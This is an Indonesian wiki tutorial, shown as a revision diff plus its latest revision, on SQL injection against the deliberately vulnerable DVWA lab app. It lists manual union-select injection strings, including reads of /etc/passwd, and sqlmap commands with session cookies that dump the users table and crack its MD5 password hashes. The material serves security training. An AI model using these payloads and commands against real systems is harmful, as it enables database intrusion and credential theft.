Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"

From OnnoWiki
Jump to navigation Jump to search
 
(3 intermediate revisions by the same user not shown)
Line 7: Line 7:
  
 
==Proses manual untuk test Vulnerability==
 
==Proses manual untuk test Vulnerability==
 +
 +
Dalam DVWA
 +
 +
Original Query
 +
 +
SELECT first_name, last_name FROM users WHERE user_ID = '$id'
 +
 +
Exploited Query
 +
 +
SELECT first_name, last_name FROM users WHERE user_ID = '' union select user, password from dvwa.users -- '
 +
 +
 +
  
 
Cek apakah situs kita vulnerable
 
Cek apakah situs kita vulnerable
Line 35: Line 48:
  
 
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.
 
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.
 
 
  
 
==Menggunakan SQLMAP==
 
==Menggunakan SQLMAP==
Line 43: Line 54:
  
 
  -u      URL yang dituju
 
  -u      URL yang dituju
  -cookie mengirimkan / mengemulasi sebuah cookie header
+
  --cookie mengirimkan / mengemulasi sebuah cookie header
  
 
Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh
 
Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh
Line 49: Line 60:
 
  Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
 
  Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
  
  -dbs Ini akan memberikan daftar database jika sukses dilakukan.
+
  --dbs Ini akan memberikan daftar database jika sukses dilakukan.
 
  -D  Ini untuk menentukan database yang diserang.  
 
  -D  Ini untuk menentukan database yang diserang.  
  -tables untuk melihat daftar tabel dari database -D parm.  
+
  --tables untuk melihat daftar tabel dari database -D parm.  
  -columns untuk melihat kolom di -tables parm
+
  --columns untuk melihat kolom di -tables parm
  -current-user untuk melihat current user yang menjalankan SQL
+
  --current-user untuk melihat current user yang menjalankan SQL
  -users untuk melihat semua users dari SQL
+
  --users untuk melihat semua users dari SQL
  -passwords untuk memberikan password yang di hash dari SQL instance.
+
  --passwords untuk memberikan password yang di hash dari SQL instance.
  
 
==Contoh Eksekusi==
 
==Contoh Eksekusi==
  
 +
===Cek daftar database yang ada===
 +
 +
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
 +
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs
 +
 +
hasilnya
 +
 +
[07:02:08] [INFO] fetching database names
 +
available databases [7]:
 +
[*] dvwa
 +
[*] information_schema
 +
[*] mediawiki
 +
[*] moodle
 +
[*] mysql
 +
[*] performance_schema
 +
[*] snort
 +
 +
===Cek daftar tabel dari database dvwa===
 +
 +
 +
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
 +
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables
 +
 +
 +
Hasilnya
 +
 +
[07:08:39] [INFO] fetching tables for database: 'dvwa'
 +
[07:08:39] [WARNING] reflective value(s) found and filtering out
 +
Database: dvwa
 +
[2 tables]
 +
+-----------+
 +
| guestbook |
 +
| users    |
 +
+-----------+
 +
 +
 +
===Cek format kolom tabel users===
  
  sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit# \
+
  sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
  -cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" -dbs
+
  --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns
  
 +
Hasilnya
  
 +
[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa'
 +
[07:11:51] [WARNING] reflective value(s) found and filtering out
 +
Database: dvwa
 +
Table: users
 +
[6 columns]
 +
+------------+-------------+
 +
| Column    | Type        |
 +
+------------+-------------+
 +
| user      | varchar(15) |
 +
| avatar    | varchar(70) |
 +
| first_name | varchar(15) |
 +
| last_name  | varchar(15) |
 +
| password  | varchar(32) |
 +
| user_id    | int(6)      |
 +
+------------+-------------+
  
sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ –dbs
+
===dump password===
  
Returns
 
[15:17:52] [INFO] fetching database names
 
available databases [4]:
 
[*] dvwa
 
[*] information_schema
 
[*] mysql
 
[*] performance_schema
 
sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa –tables
 
  
Returns
+
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
[15:18:19] [INFO] fetching tables for database: ‘dvwa’
+
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump
Database: dvwa
 
[2 tables]
 
+———–+
 
| guestbook |
 
| users      |
 
+———–+
 
sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa -T users –columns
 
  
Returns
 
[15:19:14] [INFO] fetching columns for table ‘users’ in database ‘dvwa’
 
Database: dvwa
 
Table: users
 
[6 columns]
 
+————+————-+
 
| Column    | Type          |
 
+————+————-+
 
| user          | varchar(15) |
 
| avatar      | varchar(70) |
 
| first_name | varchar(15) |
 
| last_name | varchar(15) |
 
| password  | varchar(32) |
 
| user_id      | int(6)        |
 
+————+————-+
 
sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa -T users –dump
 
  
–dump will dump the data if there are passwords that are hashed depending on the version of SQLMAP you have will prompt to crack the passwords. You can specify your own dictionary or you can use the one that they specify. However the base dictionary cracks all the user passwords
+
--dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri.
  
See the output
+
Hasilnya
  
[15:21:44] [INFO] starting dictionary-based cracking (md5_generic_passwd)
+
[07:15:16] [INFO] using hash method 'md5_generic_passwd'
[15:21:44] [INFO] starting 4 processes
+
what dictionary do you want to use?
[15:21:47] [INFO] cracked password ‘abc123′ for hash ‘e99a18c428cb38d5f260853678922e03′
+
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[15:21:50] [INFO] cracked password ‘charley’ for hash ’8d3533d75ae2c3966d7e0d4fcc69216b’
+
[2] custom dictionary file
[15:21:53] [INFO] cracked password ‘letmein’ for hash ’0d107d09f5bbe40cade3de5c71e9e9b7′
+
[3] file with list of dictionary files
[15:21:55] [INFO] cracked password ‘password’ for hash ’5f4dcc3b5aa765d61d8327deb882cf99′
+
> 1
Database: dvwa
+
[07:15:21] [INFO] using default dictionary
Table: users
+
do you want to use common password suffixes? (slow!) [y/N] y
[5 entries]
+
[07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd)
+———+———+———————————————————–+———–+————+
+
[07:15:30] [INFO] starting 2 processes  
| user_id | user    | password                                                           | last_name | first_name |
+
[07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                                           
+———+———+———————————————————–+———–+————+
+
[07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                                                           
| 1         | admin  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin    | admin      |
+
[07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                                                           
| 2         | gordonb| e99a18c428cb38d5f260853678922e03 (abc123)  | Brown    | Gordon    |
+
[07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                                                         
| 3         | 1337     | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)   | Me         | Hack       |
+
[07:16:00] [INFO] postprocessing table dump                                                                                                       
| 4         | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)   | Picasso   | Pablo       |
+
Database: dvwa
| 5         | smithy   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob         |
+
Table: users
+———+———+———————————————————–+———–+————+
+
[5 entries]
 +
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
 +
| user_id | user    | avatar                          | password                                   | last_name | first_name |
 +
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
 +
| 1       | admin  | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin    | admin      |
 +
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)  | Brown    | Gordon    |
 +
| 3       | 1337   | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me       | Hack       |
 +
| 4       | pablo   | dvwa/hackable/users/pablo.jpg  | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso   | Pablo     |
 +
| 5       | smithy | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob       |
 +
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
  
There you have it you know just gained access to all the sql users.
+
Maka kita memperoleh password dari semua sql user :)
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
 
* http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Latest revision as of 05:56, 4 March 2017

Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Latar Belakang

Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.


Proses manual untuk test Vulnerability

Dalam DVWA

Original Query 

SELECT first_name, last_name FROM users WHERE user_ID = '$id'

Exploited Query 

SELECT first_name, last_name FROM users WHERE user_ID =  union select user, password from dvwa.users -- '



Cek apakah situs kita vulnerable 

1′ or ’2′=’2

Kita perlu melihat berapa banyak kolom sebelum ada error. 

‘ and 1=1 union select 1,2 #
‘ and 1=1 union select 1,2,3 #

Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.

Mari kita melakukan injection. 

‘ union SELECT 1, user() — ‘
‘ and 1=1 union select database(),version() #
‘ union SELECT 1, user() #
‘ and 1=1 union select null,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ #
‘ and 1=1 union select first_name,password from dvwa.users #
‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ #
‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ #
‘ union select user, password FROM users #
‘ union SELECT 1, load_file(‘/etc/hosts’) #
‘ union SELECT 1, load_file(‘/etc/passwd’) #

Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.

Menggunakan SQLMAP

Parameter yang kita gunakan & artinya 

-u      URL yang dituju
--cookie mengirimkan / mengemulasi sebuah cookie header

Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh 

Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7

--dbs Ini akan memberikan daftar database jika sukses dilakukan.
-D   Ini untuk menentukan database yang diserang. 
--tables untuk melihat daftar tabel dari database -D parm. 
--columns untuk melihat kolom di -tables parm
--current-user untuk melihat current user yang menjalankan SQL
--users untuk melihat semua users dari SQL
--passwords untuk memberikan password yang di hash dari SQL instance.

Contoh Eksekusi

Cek daftar database yang ada

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs

hasilnya 

[07:02:08] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mediawiki
[*] moodle
[*] mysql
[*] performance_schema
[*] snort

Cek daftar tabel dari database dvwa

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables


Hasilnya 

[07:08:39] [INFO] fetching tables for database: 'dvwa'
[07:08:39] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+


Cek format kolom tabel users

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns

Hasilnya 

[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa'
[07:11:51] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

dump password

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump


--dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri.

Hasilnya 

[07:15:16] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[07:15:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:15:30] [INFO] starting 2 processes 
[07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                                             
[07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                                                            
[07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                                                            
[07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                                                           
[07:16:00] [INFO] postprocessing table dump                                                                                                         
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                          | password                                    | last_name | first_name |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+

Maka kita memperoleh password dari semua sql user :)

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=SQLMap:_Contoh_SQL_Injection_ke_DVWA&oldid=47174"